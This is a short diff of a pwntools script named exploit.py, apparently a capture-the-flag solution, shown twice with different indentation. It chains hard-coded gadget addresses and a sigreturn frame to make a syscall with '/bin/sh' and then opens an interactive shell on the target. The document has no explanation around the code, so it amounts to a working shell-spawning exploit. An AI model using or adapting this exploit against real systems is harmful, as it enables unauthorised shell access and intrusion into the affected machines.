chop0 · February 14, 2021 06:30
diff --git a/exploit.py b/exploit.py
 io = start()

 zero_rsi = 0x400134
 add_rsi = 0x400126
 syscall = 0x400123
 read = 0x40011c
 # shellcode = asm(shellcraft.sh())
 # payload = fit({
 #     32: 0xdeadbeef,
 #     'iaaa': [1, 2, 'Hello', 3]
 # }, length=128)
 # io.send(payload)
 # flag = io.recv(...)
 # log.success(flag)
 buf = p64(zero_rsi)
 buf += p64(add_rsi)*10
 buf += p64(read)
 buf += p64(syscall)
 #f = open("o", "wb")
 #f.write(buf)
 #f.close()
 print("lemon")

 frame =SigreturnFrame()

 frame.rax = 322
 frame.rdi = 0
 frame.rsi = 0xccccccc9666*10
 frame.rdx = (0xccccccc9666*10)+100
 frame.rip = syscall

 buf += bytes(frame)
 io.sendline(buf)

 import time
 time.sleep(0.1)
 buf = b"/bin/sh\x00"
 buf += b"A"*(0xf-len(buf))
 io.send(buf)

 io.interactive()
	io = start()

	zero_rsi = 0x400134
	add_rsi = 0x400126
	syscall = 0x400123
	read = 0x40011c
	# shellcode = asm(shellcraft.sh())
	# payload = fit({
	# 32: 0xdeadbeef,
	# 'iaaa': [1, 2, 'Hello', 3]
	# }, length=128)
	# io.send(payload)
	# flag = io.recv(...)
	# log.success(flag)
	buf = p64(zero_rsi)
	buf += p64(add_rsi)*10
	buf += p64(read)
	buf += p64(syscall)
	#f = open("o", "wb")
	#f.write(buf)
	#f.close()
	print("lemon")

	frame =SigreturnFrame()

	frame.rax = 322
	frame.rdi = 0
	frame.rsi = 0xccccccc9666*10
	frame.rdx = (0xccccccc9666*10)+100
	frame.rip = syscall

	buf += bytes(frame)
	io.sendline(buf)

	import time
	time.sleep(0.1)
	buf = b"/bin/sh\x00"
	buf += b"A"*(0xf-len(buf))
	io.send(buf)

	io.interactive()